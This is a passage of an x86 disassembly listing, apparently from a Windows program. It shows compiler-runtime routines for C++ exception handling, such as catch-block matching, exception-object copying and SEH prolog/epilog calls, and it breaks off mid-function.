mov ds:dword_426404, eax
pop ecx
mov ds:byte_426408, 1
xor eax, eax
retn
sub_40B18A endp
; =============== S U B R O U T I N E =======================================
sub_40B1AB proc near ; DATA XREF: seg001:0041D2F0�o
cmp ds:byte_426408, 0
jz short locret_40B1CE
push ds:dword_426404
call sub_405193
pop ecx
push eax
call ds:dword_41D19C
mov ds:byte_426408, 0
locret_40B1CE: ; CODE XREF: sub_40B1AB+7�j
retn
sub_40B1AB endp
; =============== S U B R O U T I N E =======================================
sub_40B1CF proc near ; DATA XREF: seg001:004216E8�o
mov dword ptr [ecx], offset off_41DC24
jmp sub_402CCA
sub_40B1CF endp
; ---------------------------------------------------------------------------
loc_40B1DA: ; DATA XREF: seg001:off_41DC24�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41DC24
call sub_402CCA
test byte ptr [esp+8], 1
jz short loc_40B1F6
push esi
call sub_402F6D
pop ecx
loc_40B1F6: ; CODE XREF: seg000:0040B1ED�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_40B1FC proc near ; CODE XREF: sub_40B43B+4E�p
; sub_40BA07+21A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_40B252
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_40B252
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_40B230
add ecx, 8
push ecx
push edx
call sub_407FD0
test eax, eax
pop ecx
pop ecx
jz short loc_40B230
loc_40B22C: ; CODE XREF: sub_40B1FC+3C�j
; sub_40B1FC+4B�j ...
xor eax, eax
jmp short loc_40B255
; ---------------------------------------------------------------------------
loc_40B230: ; CODE XREF: sub_40B1FC+1E�j
; sub_40B1FC+2E�j
test byte ptr [esi], 2
jz short loc_40B23A
test byte ptr [edi], 8
jz short loc_40B22C
loc_40B23A: ; CODE XREF: sub_40B1FC+37�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_40B249
test byte ptr [edi], 1
jz short loc_40B22C
loc_40B249: ; CODE XREF: sub_40B1FC+46�j
test al, 2
jz short loc_40B252
test byte ptr [edi], 2
jz short loc_40B22C
loc_40B252: ; CODE XREF: sub_40B1FC+B�j
; sub_40B1FC+13�j ...
xor eax, eax
inc eax
loc_40B255: ; CODE XREF: sub_40B1FC+32�j
pop edi
pop esi
retn
sub_40B1FC endp
; =============== S U B R O U T I N E =======================================
sub_40B258 proc near ; CODE XREF: sub_40B29C+85�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0E0434F4Dh
jz short loc_40B27F
cmp eax, 0E06D7363h
jnz short loc_40B299
call sub_40539D
and dword ptr [eax+90h], 0
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40B27F: ; CODE XREF: sub_40B258+D�j
call sub_40539D
cmp dword ptr [eax+90h], 0
jle short loc_40B299
call sub_40539D
add eax, 90h
dec dword ptr [eax]
loc_40B299: ; CODE XREF: sub_40B258+14�j
; sub_40B258+33�j
xor eax, eax
retn
sub_40B258 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B29C proc near ; CODE XREF: sub_40B4FD+EC�p
; sub_40B8A9+36�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset dword_4215E0
call __SEH_prolog4
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
cmp dword ptr [edi+4], 80h
jg short loc_40B2BD
movsx esi, byte ptr [ebx+8]
jmp short loc_40B2C0
; ---------------------------------------------------------------------------
loc_40B2BD: ; CODE XREF: sub_40B29C+19�j
mov esi, [ebx+8]
loc_40B2C0: ; CODE XREF: sub_40B29C+1F�j
mov [ebp+var_1C], esi
call sub_40539D
add eax, 90h
inc dword ptr [eax]
and [ebp+ms_exc.disabled], 0
loc_40B2D3: ; CODE XREF: sub_40B29C+9F�j
cmp esi, [ebp+arg_C]
jz short loc_40B33D
cmp esi, 0FFFFFFFFh
jle short loc_40B2E2
cmp esi, [edi+4]
jl short loc_40B2E7
loc_40B2E2: ; CODE XREF: sub_40B29C+3F�j
call sub_40BEA5
loc_40B2E7: ; CODE XREF: sub_40B29C+44�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_40B318
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_40BEF0
loc_40B318: ; CODE XREF: sub_40B29C+65�j
and [ebp+ms_exc.disabled], 0
jmp short loc_40B338
; ---------------------------------------------------------------------------
loc_40B31E: ; DATA XREF: seg001:00421600�o
push [ebp+ms_exc.exc_ptr]
call sub_40B258
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40B328: ; DATA XREF: seg001:00421604�o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_40B338: ; CODE XREF: sub_40B29C+80�j
mov [ebp+var_1C], esi
jmp short loc_40B2D3
; ---------------------------------------------------------------------------
loc_40B33D: ; CODE XREF: sub_40B29C+3A�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40B362
cmp esi, [ebp+arg_C]
jz short loc_40B353
call sub_40BEA5
loc_40B353: ; CODE XREF: sub_40B29C+B0�j
mov [ebx+8], esi
call __SEH_epilog4
retn
sub_40B29C endp
; =============== S U B R O U T I N E =======================================
sub_40B35C proc near ; DATA XREF: seg001:004215F8�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_40B35C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B362 proc near ; CODE XREF: sub_40B29C+A8�p
call sub_40539D
cmp dword ptr [eax+90h], 0
jle short locret_40B37C
call sub_40539D
add eax, 90h
dec dword ptr [eax]
locret_40B37C: ; CODE XREF: sub_40B362+C�j
retn
sub_40B362 endp
; =============== S U B R O U T I N E =======================================
sub_40B37D proc near ; CODE XREF: sub_40B4FD+93�p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_40B3BF
cmp dword ptr [eax+10h], 3
jnz short loc_40B3BF
mov ecx, [eax+14h]
cmp ecx, 19930520h
jz short loc_40B3A8
cmp ecx, 19930521h
jz short loc_40B3A8
cmp ecx, 19930522h
jnz short loc_40B3BF
loc_40B3A8: ; CODE XREF: sub_40B37D+19�j
; sub_40B37D+21�j
cmp dword ptr [eax+1Ch], 0
jnz short loc_40B3BF
call sub_40539D
xor ecx, ecx
inc ecx
mov [eax+20Ch], ecx
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40B3BF: ; CODE XREF: sub_40B37D+8�j
; sub_40B37D+E�j ...
xor eax, eax
retn
sub_40B37D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B3C2 proc near ; CODE XREF: sub_406640+112�p
; sub_40B623+6E�p ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421608
call __SEH_prolog4
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short loc_40B3FF
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_40B3FF
mov eax, [ecx+1Ch]
test eax, eax
jz short loc_40B3FF
mov eax, [eax+4]
test eax, eax
jz short loc_40B3FF
and [ebp+ms_exc.disabled], 0
push eax
push dword ptr [ecx+18h]
call sub_404235
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40B3FF: ; CODE XREF: sub_40B3C2+11�j
; sub_40B3C2+19�j ...
call __SEH_epilog4
retn
sub_40B3C2 endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_40BE59
; =============== S U B R O U T I N E =======================================
sub_40B416 proc near ; CODE XREF: sub_40B699+86�p
; sub_40B699+113�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov eax, [ecx]
push esi
mov esi, [esp+4+arg_0]
add eax, esi
cmp dword ptr [ecx+4], 0
jl short loc_40B439
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_40B439: ; CODE XREF: sub_40B416+11�j
pop esi
retn
sub_40B416 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B43B proc near ; CODE XREF: sub_40BA07+111�p
; sub_40BA07+2AE�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
test edi, edi
jnz short loc_40B44F
call sub_40BEA5
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40B44F: ; CODE XREF: sub_40B43B+8�j
and [ebp+var_8], 0
cmp dword ptr [edi], 0
mov [ebp+var_1], 0
jle short loc_40B4AF
push ebx
push esi
loc_40B45E: ; CODE XREF: sub_40B43B+70�j
mov eax, [ebp+arg_0]
mov eax, [eax+1Ch]
mov eax, [eax+0Ch]
mov ebx, [eax]
test ebx, ebx
lea esi, [eax+4]
jle short loc_40B4A3
mov eax, [ebp+var_8]
shl eax, 4
mov [ebp+var_C], eax
loc_40B479: ; CODE XREF: sub_40B43B+60�j
mov ecx, [ebp+arg_0]
push dword ptr [ecx+1Ch]
mov eax, [esi]
push eax
mov eax, [edi+4]
add eax, [ebp+var_C]
push eax
call sub_40B1FC
add esp, 0Ch
test eax, eax
jnz short loc_40B49F
dec ebx
add esi, 4
test ebx, ebx
jg short loc_40B479
jmp short loc_40B4A3
; ---------------------------------------------------------------------------
loc_40B49F: ; CODE XREF: sub_40B43B+58�j
mov [ebp+var_1], 1
loc_40B4A3: ; CODE XREF: sub_40B43B+33�j
; sub_40B43B+62�j
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [edi]
jl short loc_40B45E
pop esi
pop ebx
loc_40B4AF: ; CODE XREF: sub_40B43B+1F�j
mov al, [ebp+var_1]
leave
retn
sub_40B43B endp
; =============== S U B R O U T I N E =======================================
sub_40B4B4 proc near ; CODE XREF: sub_40BA07+30A�p
push 4
mov eax, offset loc_41C1EE
call sub_4045FF
call sub_40539D
cmp dword ptr [eax+94h], 0
jz short loc_40B4D3
call sub_40BEA5
loc_40B4D3: ; CODE XREF: sub_40B4B4+18�j
and dword ptr [ebp-4], 0
call sub_40BE92
or dword ptr [ebp-4], 0FFFFFFFFh
jmp sub_40BE59
sub_40B4B4 endp
; =============== S U B R O U T I N E =======================================
sub_40B4E5 proc near ; DATA XREF: seg001:00421630�o
call sub_40539D
mov ecx, [ebp+8]
push 0
push 0
mov [eax+94h], ecx
call sub_4041BB
int 3 ; Trap to Debugger
sub_40B4E5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B4FD proc near ; CODE XREF: sub_40B8A9+57�p
var_3C = byte ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0040B618 SIZE 00000005 BYTES
push 2Ch
push offset dword_421680
call __SEH_prolog4
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_1C], ebx
and [ebp+var_34], 0
mov eax, [edi-4]
mov [ebp+var_24], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_3C]
push eax
call sub_4044D9
pop ecx
pop ecx
mov [ebp+var_28], eax
call sub_40539D
mov eax, [eax+88h]
mov [ebp+var_2C], eax
call sub_40539D
mov eax, [eax+8Ch]
mov [ebp+var_30], eax
call sub_40539D
mov [eax+88h], esi
call sub_40539D
mov ecx, [ebp+arg_8]
mov [eax+8Ch], ecx
and [ebp+ms_exc.disabled], 0
xor eax, eax
inc eax
mov [ebp+arg_8], eax
mov [ebp+ms_exc.disabled], eax
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_40456E
add esp, 14h
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
jmp short loc_40B5FC
; ---------------------------------------------------------------------------
loc_40B58D: ; DATA XREF: seg001:004216A0�o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_40B37D
retn
; ---------------------------------------------------------------------------
loc_40B596: ; DATA XREF: seg001:004216A4�o
mov esp, [ebp+ms_exc.old_esp]
call sub_40539D
and dword ptr [eax+20Ch], 0
mov esi, [ebp+arg_C]
mov edi, [ebp+arg_4]
cmp dword ptr [esi+4], 80h
jg short loc_40B5BA
movsx ecx, byte ptr [edi+8]
jmp short loc_40B5BD
; ---------------------------------------------------------------------------
loc_40B5BA: ; CODE XREF: sub_40B4FD+B5�j
mov ecx, [edi+8]
loc_40B5BD: ; CODE XREF: sub_40B4FD+BB�j
mov ebx, [esi+10h]
and [ebp+var_20], 0
loc_40B5C4: ; CODE XREF: sub_40B4FD+11E�j
mov eax, [ebp+var_20]
cmp eax, [esi+0Ch]
jnb short loc_40B5E4
imul eax, 14h
add eax, ebx
mov edx, [eax+4]
cmp ecx, edx
jle short loc_40B618
cmp ecx, [eax+8]
jg short loc_40B618
mov eax, [esi+8]
mov ecx, [eax+edx*8+8]
loc_40B5E4: ; CODE XREF: sub_40B4FD+CD�j
push ecx
push esi
push 0
push edi
call sub_40B29C
add esp, 10h
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
loc_40B5FC: ; CODE XREF: sub_40B4FD+8E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov [ebp+arg_8], 0
call sub_40B623
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40B4FD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40B4FD
loc_40B618: ; CODE XREF: sub_40B4FD+D9�j
; sub_40B4FD+DE�j
inc [ebp+var_20]
jmp short loc_40B5C4
; END OF FUNCTION CHUNK FOR sub_40B4FD
; =============== S U B R O U T I N E =======================================
sub_40B61D proc near ; DATA XREF: seg001:00421698�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_40B61D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B623 proc near ; CODE XREF: sub_40B4FD+10D�p
mov eax, [ebp-24h]
mov [edi-4], eax
push dword ptr [ebp-28h]
call sub_404522
pop ecx
call sub_40539D
mov ecx, [ebp-2Ch]
mov [eax+88h], ecx
call sub_40539D
mov ecx, [ebp-30h]
mov [eax+8Ch], ecx
cmp dword ptr [esi], 0E06D7363h
jnz short locret_40B698
cmp dword ptr [esi+10h], 3
jnz short locret_40B698
mov eax, [esi+14h]
cmp eax, 19930520h
jz short loc_40B674
cmp eax, 19930521h
jz short loc_40B674
cmp eax, 19930522h
jnz short locret_40B698
loc_40B674: ; CODE XREF: sub_40B623+41�j
; sub_40B623+48�j
cmp dword ptr [ebp-34h], 0
jnz short locret_40B698
cmp dword ptr [ebp-1Ch], 0
jz short locret_40B698
push dword ptr [esi+18h]
call sub_404501
pop ecx
test eax, eax
jz short locret_40B698
push dword ptr [ebp+10h]
push esi
call sub_40B3C2
pop ecx
pop ecx
locret_40B698: ; CODE XREF: sub_40B623+31�j
; sub_40B623+37�j ...
retn
sub_40B623 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B699 proc near ; CODE XREF: sub_40B818+36�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 0Ch
push offset dword_4216A8
call __SEH_prolog4
xor edx, edx
mov [ebp+var_1C], edx
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
cmp ecx, edx
jz loc_40B810
cmp [ecx+8], dl
jz loc_40B810
mov ecx, [eax+8]
cmp ecx, edx
jnz short loc_40B6D4
test dword ptr [eax], 80000000h
jz loc_40B810
loc_40B6D4: ; CODE XREF: sub_40B699+2D�j
mov eax, [eax]
mov esi, [ebp+arg_4]
test eax, eax
js short loc_40B6E1
lea esi, [ecx+esi+0Ch]
loc_40B6E1: ; CODE XREF: sub_40B699+42�j
mov [ebp+ms_exc.disabled], edx
xor ebx, ebx
inc ebx
push ebx
test al, 8
jz short loc_40B72D
mov edi, [ebp+arg_0]
push dword ptr [edi+18h]
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
mov eax, [edi+18h]
mov [esi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_40B71E: ; CODE XREF: sub_40B699+E7�j
push eax
call sub_40B416
pop ecx
pop ecx
mov [esi], eax
jmp loc_40B7F8
; ---------------------------------------------------------------------------
loc_40B72D: ; CODE XREF: sub_40B699+51�j
mov edi, [ebp+arg_C]
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
test [edi], bl
jz short loc_40B782
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
push dword ptr [edi+14h]
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push esi
call sub_407370
add esp, 0Ch
cmp dword ptr [edi+14h], 4
jnz loc_40B7F8
mov eax, [esi]
test eax, eax
jz short loc_40B7F8
add edi, 8
push edi
jmp short loc_40B71E
; ---------------------------------------------------------------------------
loc_40B782: ; CODE XREF: sub_40B699+9F�j
cmp [edi+18h], edx
jnz short loc_40B7BF
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push dword ptr [edi+14h]
add edi, 8
push edi
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
call sub_40B416
pop ecx
pop ecx
push eax
push esi
call sub_407370
add esp, 0Ch
jmp short loc_40B7F8
; ---------------------------------------------------------------------------
loc_40B7BF: ; CODE XREF: sub_40B699+EC�j
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push dword ptr [edi+18h]
call sub_4101B0
pop ecx
test eax, eax
jz short loc_40B7F3
test byte ptr [edi], 4
push 0
pop eax
setnz al
inc eax
mov [ebp+var_1C], eax
jmp short loc_40B7F8
; ---------------------------------------------------------------------------
loc_40B7F3: ; CODE XREF: sub_40B699+62�j
; sub_40B699+73�j ...
call sub_40BEA5
loc_40B7F8: ; CODE XREF: sub_40B699+8F�j
; sub_40B699+D7�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_1C]
jmp short loc_40B812
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40B810: ; CODE XREF: sub_40B699+19�j
; sub_40B699+22�j ...
xor eax, eax
loc_40B812: ; CODE XREF: sub_40B699+169�j
call __SEH_epilog4
retn
sub_40B699 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B818 proc near ; CODE XREF: sub_40B8A9+11�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 8
push offset dword_4216C8
call __SEH_prolog4
mov eax, [ebp+arg_8]
test dword ptr [eax], 80000000h
jz short loc_40B834
mov ebx, [ebp+arg_4]
jmp short loc_40B83E
; ---------------------------------------------------------------------------
loc_40B834: ; CODE XREF: sub_40B818+15�j
mov ecx, [eax+8]
mov edx, [ebp+arg_4]
lea ebx, [ecx+edx+0Ch]
loc_40B83E: ; CODE XREF: sub_40B818+1A�j
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_C]
push esi
push eax
push [ebp+arg_4]
mov edi, [ebp+arg_0]
push edi
call sub_40B699
add esp, 10h
dec eax
jz short loc_40B878
dec eax
jnz short loc_40B890
push 1
lea eax, [esi+8]
push eax
push dword ptr [edi+18h]
call sub_40B416
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push ebx
call sub_404235
jmp short loc_40B890
; ---------------------------------------------------------------------------
loc_40B878: ; CODE XREF: sub_40B818+3F�j
lea eax, [esi+8]
push eax
push dword ptr [edi+18h]
call sub_40B416
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push ebx
call sub_404235
loc_40B890: ; CODE XREF: sub_40B818+42�j
; sub_40B818+5E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call __SEH_epilog4
retn
sub_40B818 endp
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_40BE59
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B8A9 proc near ; CODE XREF: sub_40B915+D4�p
; sub_40BA07+25D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
cmp [ebp+arg_10], 0
jz short loc_40B8C2
push [ebp+arg_10]
push ebx
push esi
push [ebp+arg_0]
call sub_40B818
add esp, 10h
loc_40B8C2: ; CODE XREF: sub_40B8A9+7�j
cmp [ebp+arg_18], 0
push [ebp+arg_0]
jnz short loc_40B8CE
push esi
jmp short loc_40B8D1
; ---------------------------------------------------------------------------
loc_40B8CE: ; CODE XREF: sub_40B8A9+20�j
push [ebp+arg_18]
loc_40B8D1: ; CODE XREF: sub_40B8A9+23�j
call sub_40423C
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_40B29C
mov eax, [edi+4]
push 100h
push [ebp+arg_14]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_40B4FD
add esp, 28h
test eax, eax
jz short loc_40B913
push esi
push eax
call sub_404205
loc_40B913: ; CODE XREF: sub_40B8A9+61�j
pop ebp
retn
sub_40B8A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B915 proc near ; CODE XREF: sub_40BA07+336�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi], 80000003h
jz loc_40BA04
push edi
call sub_40539D
cmp dword ptr [eax+80h], 0
jz short loc_40B978
call sub_40539D
lea edi, [eax+80h]
call sub_40518A
cmp [edi], eax
jz short loc_40B978
cmp dword ptr [esi], 0E0434F4Dh
jz short loc_40B978
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_4042F4
add esp, 1Ch
test eax, eax
jnz loc_40BA03
loc_40B978: ; CODE XREF: sub_40B915+22�j
; sub_40B915+36�j ...
mov edi, [ebp+arg_10]
cmp dword ptr [edi+0Ch], 0
jnz short loc_40B986
call sub_40BEA5
loc_40B986: ; CODE XREF: sub_40B915+6A�j
mov esi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push edi
call sub_404466
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_40BA03
push ebx
loc_40B9A9: ; CODE XREF: sub_40B915+EB�j
cmp esi, [edi]
jl short loc_40B9F4
cmp esi, [edi+4]
jg short loc_40B9F4
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_40B9CA
cmp byte ptr [ecx+8], 0
jnz short loc_40B9F4
loc_40B9CA: ; CODE XREF: sub_40B915+AD�j
lea ebx, [eax-10h]
test byte ptr [ebx], 40h
jnz short loc_40B9F4
push [ebp+arg_1C]
mov esi, [ebp+arg_4]
push [ebp+arg_18]
push 0
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_40B8A9
mov esi, [ebp+arg_14]
add esp, 1Ch
loc_40B9F4: ; CODE XREF: sub_40B915+96�j
; sub_40B915+9B�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_40B9A9
pop ebx
loc_40BA03: ; CODE XREF: sub_40B915+5D�j
; sub_40B915+91�j
pop edi
loc_40BA04: ; CODE XREF: sub_40B915+F�j
pop esi
leave
retn
sub_40B915 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA07 proc near ; CODE XREF: sub_40BD75+D4�p
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 2Ch
mov ecx, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_10]
mov eax, [ebx+4]
cmp eax, 80h
push esi
push edi
mov [ebp+var_1], 0
jg short loc_40BA2A
movsx ecx, byte ptr [ecx+8]
jmp short loc_40BA2D
; ---------------------------------------------------------------------------
loc_40BA2A: ; CODE XREF: sub_40BA07+1B�j
mov ecx, [ecx+8]
loc_40BA2D: ; CODE XREF: sub_40BA07+21�j
cmp ecx, 0FFFFFFFFh
mov [ebp+var_8], ecx
jl short loc_40BA39
cmp ecx, eax
jl short loc_40BA3E
loc_40BA39: ; CODE XREF: sub_40BA07+2C�j
call sub_40BEA5
loc_40BA3E: ; CODE XREF: sub_40BA07+30�j
mov esi, [ebp+arg_0]
mov edi, 0E06D7363h
cmp [esi], edi
jnz loc_40BD19
cmp dword ptr [esi+10h], 3
mov ebx, 19930520h
jnz loc_40BB86
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BA76
cmp eax, 19930521h
jz short loc_40BA76
cmp eax, 19930522h
jnz loc_40BB86
loc_40BA76: ; CODE XREF: sub_40BA07+5B�j
; sub_40BA07+62�j
cmp dword ptr [esi+1Ch], 0
jnz loc_40BB86
call sub_40539D
cmp dword ptr [eax+88h], 0
jz loc_40BD58
call sub_40539D
mov esi, [eax+88h]
mov [ebp+arg_0], esi
call sub_40539D
mov eax, [eax+8Ch]
push 1
push esi
mov [ebp+arg_8], eax
call sub_4101B0
test eax, eax
pop ecx
pop ecx
jnz short loc_40BAC1
call sub_40BEA5
loc_40BAC1: ; CODE XREF: sub_40BA07+B3�j
cmp [esi], edi
jnz short loc_40BAEB
cmp dword ptr [esi+10h], 3
jnz short loc_40BAEB
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BAE0
cmp eax, 19930521h
jz short loc_40BAE0
cmp eax, 19930522h
jnz short loc_40BAEB
loc_40BAE0: ; CODE XREF: sub_40BA07+C9�j
; sub_40BA07+D0�j
cmp dword ptr [esi+1Ch], 0
jnz short loc_40BAEB
call sub_40BEA5
loc_40BAEB: ; CODE XREF: sub_40BA07+BC�j
; sub_40BA07+C2�j ...
call sub_40539D
cmp dword ptr [eax+94h], 0
jz loc_40BB86
call sub_40539D
mov edi, [eax+94h]
call sub_40539D
push [ebp+arg_0]
xor esi, esi
mov [eax+94h], esi
call sub_40B43B
test al, al
pop ecx
jnz short loc_40BB7E
xor ebx, ebx
cmp [edi], ebx
jle short loc_40BB45
loc_40BB28: ; CODE XREF: sub_40BA07+13C�j
mov eax, [edi+4]
mov ecx, [ebx+eax+4]
push offset off_423E50
call sub_403017
test al, al
jnz short loc_40BB4A
inc esi
add ebx, 10h
cmp esi, [edi]
jl short loc_40BB28
loc_40BB45: ; CODE XREF: sub_40BA07+11F�j
; sub_40BA07+31C�j
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40BB4A: ; CODE XREF: sub_40BA07+134�j
push 1
push [ebp+arg_0]
call sub_40B3C2
pop ecx
pop ecx
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_2C]
mov [ebp+arg_0], offset dword_41DC2C
call sub_402C0C
